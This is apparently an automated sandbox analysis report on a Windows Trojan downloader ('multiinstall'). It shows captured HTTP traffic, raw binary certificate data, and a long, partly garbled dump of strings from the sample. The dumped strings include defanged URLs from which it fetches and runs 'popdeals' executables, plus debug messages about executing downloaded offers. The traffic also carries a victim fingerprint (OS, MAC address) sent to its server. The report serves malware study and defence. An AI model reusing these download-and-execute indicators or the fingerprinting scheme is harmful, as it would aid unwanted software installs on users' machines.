....140606190440Z0"........1(...v...>a..140610185012Z0!..AI..y}I...v.......140610185029Z0!..4..k...,G.DJH.N...140610210158Z0"....T.q..i.1....T....140611033025Z0!..f.<.M]@......9.|..140616152648Z0!.......O*<R..SHx.C..140620190555Z0"......oU.fU..........140623111824Z0!../,V..r.&.uNn..*...140707151821Z0!..O..].9/.M;........140711123959Z0".........i[.....a{...140723190533Z0!..).'..\.H....z.pP..140725193446Z0"....__.H....Y...B.|..140729143516Z0"....v.>.D.D..g`#.@e..140731221657Z0!...J.>j.1K/..Qt.....140801080058Z0!..pc.yB..,.w.J..
<<< skipped >>>
GET /COMODORSACertificationAuthority.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.comodoca.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Jan 2015 05:11:17 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 773
Last-Modified: Fri, 16 Jan 2015 11:30:15 GMT
Connection: close
X-CCACDN-Mirror-ID: t8edcacrl3
Accept-Ranges: bytes
0...0.....0...*.H........0..1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....COMODO CA Limited1 0)..U..."COMODO RSA Certification Authority..150116113015Z..150120113015Z.00.0...U.#..0.....~.=...<....8...22.0...U.......60...*.H.............X.0..,........Ki.T..k......,..j...X..P \...u/...Z..P.A.Xu#P..._2K"p...{.IC.rDy..E...."p.2x.c..J[.Vg"..]w...Qz......Z#........W..C...j.N..M~........!l"|............C7.pc=.0jp.....Jkp...~.m....jU}.ZH....L.....yrVq..U. ....L.:......L...?^e..l...B....^D...........P..."Pa.4.....'.....P.%....J..YLq....y.Oj)f.R...g.0o..K*c.}......X~...X.}.l..w.4.. :."..~....{....<Bq...5.6...\b..... ........u#.9>..q..... .C...ce..}.....bQj.M.......i.}\......\Nq.P..V...!./...F._...}}..Q/d...<.nn...jY....PLv......P.......$A..u.?8.&...
GET /270596.png HTTP/1.1
Accept: */*
Referer: hXXp://echo.multinstall.com.br/start/?s1=69645f65783d33373337323739352669645f6c633d313126444c5645523d312e352e312e302641444d494e3d31264f535f56455253494f4e3d57696e646f777320585026535041434b3d2053657276696365205061636b2033264f535f4c414e47554147453d456e676c69736826424954533d3332264d41433d30303a30433a32393a36383a31373a424226564f4c3d4138413637413235
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: logo.ultradownloads.com.br
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Jan 2015 05:11:13 GMT
Content-Type: image/png
Content-Length: 2449
Last-Modified: Sat, 06 Oct 2012 15:41:18 GMT
Connection: keep-alive
Accept-Ranges: bytes
.PNG........IHDR...(...(...... H_....sBIT.....O.....PLTE.....dB..[6....r.i.3....\LOz.K7..J0...~m.I..ncP= .....:2.z.asif..oo.9..wS@ ...\l.. ....>}...Y0..~.E 3...b......`D2l.Cc.&9$..........zdT..nAB.".....NsJ...o.0,..z.Cgz@rR?.xe..p..X'h.n.gV..Va!jaU..]I5).Y.:".*].(..#........YbG.........cUHu.>s.e...B4...^.I.u.F...n.0[F:bD"......t.p..Z?I*...F. .........Sa=..K..[fsO..U .........{ma\-p.Wb.)...uzd=".Ya<E(..........k.2O).$5.........Z`.*ucOM;6...0 "|.m*".P.DmZUL4.q.;......<4...e........}<[.........a*..uZF]KEL.%...|.P..........lZ..h........xM@<!.....~vo..IkK2)D.V..kE ..Z.zn..O(O,.../..Y.".....rssRZ.G*....Z@ ...-..p.;...e.2.........Jx _k-jUJ...g.Rt`V#...0...Z..mk.;3..UiQC ....\:".L.>..zvE...v.E~.O?/.dJ;Pa1...1\.......cA*...n.b...b.8B#.8n"......R0.t.;.zc...M;(m.3]^U...P=I..el.H:)!..|..y,j .*...JxjX...kTC?TAd|;....'...GY.'.,......pHYs...........S.....tEXtCreation Time.08/26/11...l....tEXtSoftware.Adobe Fireworks CS5q..6....IDAT8.M..TRg..iX..U..N...j....Vr....Y)jf.J .........n3....US...V...mQbJ......1.R75W.4...:....}.......y.s.n0...g.(..?f..hm..p...n.e[.....]....n&$$..9.p..........).R.8^>...sq....;w(.a.?....:...=333 ..W.9......|..[...a%.F.....c....>..m^..]......Wc.l.\A...=... vt..........II.".G.....ltm...X..3...2u. 4:...'.......C.x.1..c0..@...}.].t. .#....L.=4<<<....G......V{..0(..M..y.....@......g.3`..E[.n]. .vg.....D7Tx........6...x.ddd..7~.EDD..G7......^.nix..{p..D......V$..h."..jQ....6.\...W.O:.N}..K . .....4y...Ht.J-.....6.x1......~...{"... ^.))) kii..i.Ht.....u.'!j`..'7.o.....WNp.
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1624:
`.rsrc
`.rsrc
TCppSearchAssistantOC
TCppSearchAssistantOC
TCppCScriptErrorListd%K
TCppCScriptErrorListd%K
TCppShellUIHelper
TCppShellUIHelper
TCppShellWindows\'K
TCppShellWindows\'K
TCppShellBrowserWindow
TCppShellBrowserWindow
OnWindowSetResizable8
OnWindowSetResizable8
OnWindowSetLeft8
OnWindowSetLeft8
OnWindowSetTop8
OnWindowSetTop8
OnWindowSetWidth8
OnWindowSetWidth8
OnWindowSetHeightd
OnWindowSetHeightd
TCppInternetExplorer
TCppInternetExplorer
TCppWebBrowserP)K
TCppWebBrowserP)K
TCppWebBrowser_V1
TCppWebBrowser_V1
strUrl
strUrl
TCppSearchAssistantOC *
TCppSearchAssistantOC *
TCppCScriptErrorList *
TCppCScriptErrorList *
TCppShellUIHelper *
TCppShellUIHelper *
TCppShellWindows *
TCppShellWindows *
TCppShellBrowserWindow *
TCppShellBrowserWindow *
TCppInternetExplorer *
TCppInternetExplorer *
TCppWebBrowser *
TCppWebBrowser *
TCppWebBrowser_V1 *
TCppWebBrowser_V1 *
TAutoDriver *
TAutoDriver *
TAutoDriver<:iwebbrowser2>
TAutoDriver<:iwebbrowser2>
Shdocvw_tlb::TCppWebBrowser_V1
Shdocvw_tlb::TCppWebBrowser_V1
Shdocvw_tlb::TCppWebBrowser
Shdocvw_tlb::TCppWebBrowser
Shdocvw_tlb::TCppInternetExplorer
Shdocvw_tlb::TCppInternetExplorer
Shdocvw_tlb::TCppShellBrowserWindow
Shdocvw_tlb::TCppShellBrowserWindow
Shdocvw_tlb::TCppShellWindows
Shdocvw_tlb::TCppShellWindows
Shdocvw_tlb::TCppShellUIHelper
Shdocvw_tlb::TCppShellUIHelper
Shdocvw_tlb::TCppCScriptErrorList
Shdocvw_tlb::TCppCScriptErrorList
Shdocvw_tlb::TCppSearchAssistantOC
Shdocvw_tlb::TCppSearchAssistantOC
TComInterface<:ishellwindows>
TComInterface<:ishellwindows>
TComInterface<:iwebbrowser2>
TComInterface<:iwebbrowser2>
Shdocvw_tlb::IWebBrowser2DispT<:iwebbrowser2>
Shdocvw_tlb::IWebBrowser2DispT<:iwebbrowser2>
Shdocvw_tlb::TCOMIWebBrowserT<:iwebbrowser>
Shdocvw_tlb::TCOMIWebBrowserT<:iwebbrowser>
TComInterface<:iwebbrowser>
TComInterface<:iwebbrowser>
TCOMIWebBrowser *
TCOMIWebBrowser *
IWebBrowser2Disp *
IWebBrowser2Disp *
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
UrlMon
UrlMon
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
ISupportErrorInfo
ISupportErrorInfo
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
.Owner
.Owner
ole32.dll
ole32.dll
Uh%SC
Uh%SC
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
kernel32.dll
kernel32.dll
EVariantBadIndexError
EVariantBadIndexError
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
olepro32.dll
olepro32.dll
BiDiModexeF
BiDiModexeF
OnKeyDown ^G
OnKeyDown ^G
OnKeyPress
OnKeyPress
OnKeyUp,]G
OnKeyUp,]G
ssHorizontal
ssHorizontal
AutoHotkeys
AutoHotkeys
EInvalidGraphicOperation
EInvalidGraphicOperation
KeyPreview
KeyPreview
WindowState
WindowState
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Proportional
Proportional
HelpKeyword
HelpKeyword
TDragOperation
TDragOperation
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
crSQLWait
crSQLWait
%s (%s)
%s (%s)
IMM32.DLL
IMM32.DLL
%u8F3
%u8F3
%USERPROFILE%\desktop\
%USERPROFILE%\desktop\
1.5.1.0
1.5.1.0
URL_COMUNICACAO:
URL_COMUNICACAO:
hXXp://download.popcrew.info/popdeals4.exe
hXXp://download.popcrew.info/popdeals4.exe
hXXp://download.popcrew.info/popdeals3.exe
hXXp://download.popcrew.info/popdeals3.exe
1\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopDeals
1\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopDeals
.jpeg
.jpeg
urlopen:
urlopen:
c:\program files (x86)\borland\cbuilder6\include\vcl\utilcls.h
c:\program files (x86)\borland\cbuilder6\include\vcl\utilcls.h
%s @ %s/%d
%s @ %s/%d
%s failed - %s/%d
%s failed - %s/%d
CppWebBrowser1
CppWebBrowser1
CppWebBrowser1DocumentComplete%
CppWebBrowser1DocumentComplete%
CppWebBrowser1TitleChange
CppWebBrowser1TitleChange
CppWebBrowser1NavigateError
CppWebBrowser1NavigateError
OpenWebSite
OpenWebSite
TCppCScriptErrorList
TCppCScriptErrorList
TCppShellWindows
TCppShellWindows
TCppWebBrowser
TCppWebBrowser
DOWNLOAD_URL:
DOWNLOAD_URL:
DW(14) URL que ele vai abrir apos o download:
DW(14) URL que ele vai abrir apos o download:
javascript:downloadProgress(%d,%d,0,%d);
javascript:downloadProgress(%d,%d,0,%d);
DW(1) Download da oferta (primeira URL):
DW(1) Download da oferta (primeira URL):
DW(1) Download da oferta (segunda URL):
DW(1) Download da oferta (segunda URL):
DW(4) Vai executar a oferta:
DW(4) Vai executar a oferta:
cp:%d][blocked:1
cp:%d][blocked:1
cp:%d][start:1
cp:%d][start:1
cp:%d][key:try(%d)
cp:%d][key:try(%d)
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%s%s(0%d)%s
%s%s(0%d)%s
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
{374DE290-123F-4565-9164-39C4925E467B}
{374DE290-123F-4565-9164-39C4925E467B}
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
36746191
36746191
.xyzxyzxyz
.xyzxyzxyz
hXXp://%[^/]%s
hXXp://%[^/]%s
%s/%s/?s1=
%s/%s/?s1=
id=%s
id=%s
tmpfile.tmp
tmpfile.tmp
KERNEL32.DLL
KERNEL32.DLL
Windows 8
Windows 8
Windows 7
Windows 7
Windows Vista
Windows Vista
Windows Server 2012
Windows Server 2012
Windows Server 2008 R2
Windows Server 2008 R2
Windows Server 2008
Windows Server 2008
Windows Server 2003
Windows Server 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
Windows NT4
Windows NT4
Windows NT 3.x
Windows NT 3.x
Windows NT (Indefinido)
Windows NT (Indefinido)
Windows 95A
Windows 95A
Windows 95B
Windows 95B
Windows 95C
Windows 95C
Windows 95
Windows 95
Windows 98A
Windows 98A
Windows 98SE
Windows 98SE
Windows 98
Windows 98
Windows ME
Windows ME
Windows 9x (Indefinido)
Windows 9x (Indefinido)
%.2X%s
%.2X%s
http\shell\open\command
http\shell\open\command
firefox
firefox
mozilla
mozilla
Mozilla
Mozilla
opera
opera
Opera
Opera
chrome
chrome
Chrome
Chrome
explorer.exe /n,/select,
explorer.exe /n,/select,
DW(8) Linha de comando a ser executada:
DW(8) Linha de comando a ser executada:
DW(9) Execucao com problemas:
DW(9) Execucao com problemas:
qhXXp://ns.adobe.com/xap/1.0/
qhXXp://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
SHDocVw_OCX.cpp
SHDocVw_OCX.cpp
c:\bcb\emuvcl\utilcls.h
c:\bcb\emuvcl\utilcls.h
'%s': %s @ %s/%d
'%s': %s @ %s/%d
(%s) Error: %lX (%ld) @ %s/%d
(%s) Error: %lX (%ld) @ %s/%d
this->QueryStatusWB(cmdID, (Shdocvw_tlb::OLECMDF*)&pcmdf)
this->QueryStatusWB(cmdID, (Shdocvw_tlb::OLECMDF*)&pcmdf)
F%D,3
F%D,3
xxtype.cpp
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Inappropriate I/O control operation
Broken pipe
Broken pipe
Operation not permitted
Operation not permitted
%H:%M:%S
%H:%M:%S
%m/%d/%y
%m/%d/%y
%A, %B %d, %Y
%A, %B %d, %Y
d/d/d d:d:d.d
d/d/d d:d:d.d
xx.cpp
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
elemType->tpClass.tpcFlags & CF_HAS_DTOR
_noParam.vt == VT_ERROR
_noParam.vt == VT_ERROR
VARIANT.CPP
VARIANT.CPP
_empty.vt == VT_EMPTY
_empty.vt == VT_EMPTY
vt == rhs.vt
vt == rhs.vt
Inv(%d) %s, 0x%lX, retVT(0x%X), ErrArg(%d)
Inv(%d) %s, 0x%lX, retVT(0x%X), ErrArg(%d)
Parms.vt == (VT_ARRAY|VT_VARIANT)
Parms.vt == (VT_ARRAY|VT_VARIANT)
ParmTypes.vt == (VT_ARRAY|VT_I4)
ParmTypes.vt == (VT_ARRAY|VT_I4)
multiinstall.exe
multiinstall.exe
@$xp$26Shdocvw_tlb@TCppWebBrowser
@$xp$26Shdocvw_tlb@TCppWebBrowser
@$xp$28Shdocvw_tlb@TCppShellWindows
@$xp$28Shdocvw_tlb@TCppShellWindows
@$xp$29Shdocvw_tlb@TCppShellUIHelper
@$xp$29Shdocvw_tlb@TCppShellUIHelper
@$xp$29Shdocvw_tlb@TCppWebBrowser_V1
@$xp$29Shdocvw_tlb@TCppWebBrowser_V1
@$xp$32Shdocvw_tlb@TCppCScriptErrorList
@$xp$32Shdocvw_tlb@TCppCScriptErrorList
@$xp$32Shdocvw_tlb@TCppInternetExplorer
@$xp$32Shdocvw_tlb@TCppInternetExplorer
@$xp$33Shdocvw_tlb@TCppSearchAssistantOC
@$xp$33Shdocvw_tlb@TCppSearchAssistantOC
@$xp$34Shdocvw_tlb@TCppShellBrowserWindow
@$xp$34Shdocvw_tlb@TCppShellBrowserWindow
@Shdocvw_tlb@TCppCScriptErrorList@
@Shdocvw_tlb@TCppCScriptErrorList@
@Shdocvw_tlb@TCppCScriptErrorList@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppCScriptErrorList@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppCScriptErrorList@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@Connect$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@Connect$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@ConnectTo$qqr91%TComInterface$28Shdocvw_tlb@IScriptErrorListpx5_GUID$e&@Shdocvw_tlb@IID_IScriptErrorList$%
@Shdocvw_tlb@TCppCScriptErrorList@ConnectTo$qqr91%TComInterface$28Shdocvw_tlb@IScriptErrorListpx5_GUID$e&@Shdocvw_tlb@IID_IScriptErrorList$%
@Shdocvw_tlb@TCppCScriptErrorList@Disconnect$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@Disconnect$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@GetDefaultInterface$qv
@Shdocvw_tlb@TCppCScriptErrorList@GetDefaultInterface$qv
@Shdocvw_tlb@TCppCScriptErrorList@GetDunk$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@GetDunk$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@InitServerData$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@InitServerData$qqrv
@Shdocvw_tlb@TCppInternetExplorer@
@Shdocvw_tlb@TCppInternetExplorer@
@Shdocvw_tlb@TCppInternetExplorer@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppInternetExplorer@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppInternetExplorer@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppInternetExplorer@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppInternetExplorer@Connect$qqrv
@Shdocvw_tlb@TCppInternetExplorer@Connect$qqrv
@Shdocvw_tlb@TCppInternetExplorer@ConnectTo$qqr83%TComInterface$24Shdocvw_tlb@IWebBrowser2px5_GUID$e&@Shdocvw_tlb@IID_IWebBrowser2$%
@Shdocvw_tlb@TCppInternetExplorer@ConnectTo$qqr83%TComInterface$24Shdocvw_tlb@IWebBrowser2px5_GUID$e&@Shdocvw_tlb@IID_IWebBrowser2$%
@Shdocvw_tlb@TCppInternetExplorer@Disconnect$qqrv
@Shdocvw_tlb@TCppInternetExplorer@Disconnect$qqrv
@Shdocvw_tlb@TCppInternetExplorer@GetDefaultInterface$qv
@Shdocvw_tlb@TCppInternetExplorer@GetDefaultInterface$qv
@Shdocvw_tlb@TCppInternetExplorer@GetDunk$qqrv
@Shdocvw_tlb@TCppInternetExplorer@GetDunk$qqrv
@Shdocvw_tlb@TCppInternetExplorer@InitServerData$qqrv
@Shdocvw_tlb@TCppInternetExplorer@InitServerData$qqrv
@Shdocvw_tlb@TCppInternetExplorer@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppInternetExplorer@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppSearchAssistantOC@
@Shdocvw_tlb@TCppSearchAssistantOC@
@Shdocvw_tlb@TCppSearchAssistantOC@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppSearchAssistantOC@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppSearchAssistantOC@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@Connect$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@Connect$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@ConnectTo$qqr97%TComInterface$31Shdocvw_tlb@ISearchAssistantOC3px5_GUID$e&@Shdocvw_tlb@IID_ISearchAssistantOC3$%
@Shdocvw_tlb@TCppSearchAssistantOC@ConnectTo$qqr97%TComInterface$31Shdocvw_tlb@ISearchAssistantOC3px5_GUID$e&@Shdocvw_tlb@IID_ISearchAssistantOC3$%
@Shdocvw_tlb@TCppSearchAssistantOC@Disconnect$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@Disconnect$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@GetDefaultInterface$qv
@Shdocvw_tlb@TCppSearchAssistantOC@GetDefaultInterface$qv
@Shdocvw_tlb@TCppSearchAssistantOC@GetDunk$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@GetDunk$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@InitServerData$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@InitServerData$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppSearchAssistantOC@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppShellBrowserWindow@
@Shdocvw_tlb@TCppShellBrowserWindow@
@Shdocvw_tlb@TCppShellBrowserWindow@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellBrowserWindow@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellBrowserWindow@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@Connect$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@Connect$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@ConnectTo$qqr83%TComInterface$24Shdocvw_tlb@IWebBrowser2px5_GUID$e&@Shdocvw_tlb@IID_IWebBrowser2$%
@Shdocvw_tlb@TCppShellBrowserWindow@ConnectTo$qqr83%TComInterface$24Shdocvw_tlb@IWebBrowser2px5_GUID$e&@Shdocvw_tlb@IID_IWebBrowser2$%
@Shdocvw_tlb@TCppShellBrowserWindow@Disconnect$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@Disconnect$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellBrowserWindow@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellBrowserWindow@GetDunk$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@GetDunk$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@InitServerData$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@InitServerData$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppShellBrowserWindow@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppShellUIHelper@
@Shdocvw_tlb@TCppShellUIHelper@
@Shdocvw_tlb@TCppShellUIHelper@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellUIHelper@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellUIHelper@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellUIHelper@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellUIHelper@Connect$qqrv
@Shdocvw_tlb@TCppShellUIHelper@Connect$qqrv
@Shdocvw_tlb@TCppShellUIHelper@ConnectTo$qqr87%TComInterface$26Shdocvw_tlb@IShellUIHelperpx5_GUID$e&@Shdocvw_tlb@IID_IShellUIHelper$%
@Shdocvw_tlb@TCppShellUIHelper@ConnectTo$qqr87%TComInterface$26Shdocvw_tlb@IShellUIHelperpx5_GUID$e&@Shdocvw_tlb@IID_IShellUIHelper$%
@Shdocvw_tlb@TCppShellUIHelper@Disconnect$qqrv
@Shdocvw_tlb@TCppShellUIHelper@Disconnect$qqrv
@Shdocvw_tlb@TCppShellUIHelper@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellUIHelper@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellUIHelper@GetDunk$qqrv
@Shdocvw_tlb@TCppShellUIHelper@GetDunk$qqrv
@Shdocvw_tlb@TCppShellUIHelper@InitServerData$qqrv
@Shdocvw_tlb@TCppShellUIHelper@InitServerData$qqrv
@Shdocvw_tlb@TCppShellWindows@
@Shdocvw_tlb@TCppShellWindows@
@Shdocvw_tlb@TCppShellWindows@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellWindows@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellWindows@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellWindows@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellWindows@Connect$qqrv
@Shdocvw_tlb@TCppShellWindows@Connect$qqrv
@Shdocvw_tlb@TCppShellWindows@ConnectTo$qqr85%TComInterface$25Shdocvw_tlb@IShellWindowspx5_GUID$e&@Shdocvw_tlb@IID_IShellWindows$%
@Shdocvw_tlb@TCppShellWindows@ConnectTo$qqr85%TComInterface$25Shdocvw_tlb@IShellWindowspx5_GUID$e&@Shdocvw_tlb@IID_IShellWindows$%
@Shdocvw_tlb@TCppShellWindows@Disconnect$qqrv
@Shdocvw_tlb@TCppShellWindows@Disconnect$qqrv
@Shdocvw_tlb@TCppShellWindows@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellWindows@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellWindows@GetDunk$qqrv
@Shdocvw_tlb@TCppShellWindows@GetDunk$qqrv
@Shdocvw_tlb@TCppShellWindows@InitServerData$qqrv
@Shdocvw_tlb@TCppShellWindows@InitServerData$qqrv
@Shdocvw_tlb@TCppShellWindows@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppShellWindows@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppWebBrowser@
@Shdocvw_tlb@TCppWebBrowser@
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrp6HWND__
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrp6HWND__
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrpv
@Shdocvw_tlb@TCppWebBrowser@$bctr$qqrpv
@Shdocvw_tlb@TCppWebBrowser@CControlData
@Shdocvw_tlb@TCppWebBrowser@CControlData
@Shdocvw_tlb@TCppWebBrowser@ClientToWindow$qqrpit1
@Shdocvw_tlb@TCppWebBrowser@ClientToWindow$qqrpit1
@Shdocvw_tlb@TCppWebBrowser@CreateControl$qqrv
@Shdocvw_tlb@TCppWebBrowser@CreateControl$qqrv
@Shdocvw_tlb@TCppWebBrowser@DEF_CTL_INTF
@Shdocvw_tlb@TCppWebBrowser@DEF_CTL_INTF
@Shdocvw_tlb@TCppWebBrowser@EventDispIDs
@Shdocvw_tlb@TCppWebBrowser@EventDispIDs
@Shdocvw_tlb@TCppWebBrowser@ExecWB$qqr20Shdocvw_tlb@OLECMDID25Shdocvw_tlb@OLECMDEXECOPTp10tagVARIANTt3
@Shdocvw_tlb@TCppWebBrowser@ExecWB$qqr20Shdocvw_tlb@OLECMDID25Shdocvw_tlb@OLECMDEXECOPTp10tagVARIANTt3
@Shdocvw_tlb@TCppWebBrowser@GetDefaultInterface$qqrv
@Shdocvw_tlb@TCppWebBrowser@GetDefaultInterface$qqrv
@Shdocvw_tlb@TCppWebBrowser@GetProperty$qqrpb
@Shdocvw_tlb@TCppWebBrowser@GetProperty$qqrpb
@Shdocvw_tlb@TCppWebBrowser@GetWordBoolProp$qqri
@Shdocvw_tlb@TCppWebBrowser@GetWordBoolProp$qqri
@Shdocvw_tlb@TCppWebBrowser@GoBack$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoBack$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoForward$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoForward$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoHome$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoHome$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoSearch$qqrv
@Shdocvw_tlb@TCppWebBrowser@GoSearch$qqrv
@Shdocvw_tlb@TCppWebBrowser@InitControlData$qqrv
@Shdocvw_tlb@TCppWebBrowser@InitControlData$qqrv
@Shdocvw_tlb@TCppWebBrowser@Navigate$qqrpbp10tagVARIANTt2t2t2
@Shdocvw_tlb@TCppWebBrowser@Navigate$qqrpbp10tagVARIANTt2t2t2
@Shdocvw_tlb@TCppWebBrowser@Navigate2$qqrp10tagVARIANTt1t1t1t1
@Shdocvw_tlb@TCppWebBrowser@Navigate2$qqrp10tagVARIANTt1t1t1t1
@Shdocvw_tlb@TCppWebBrowser@OptParam
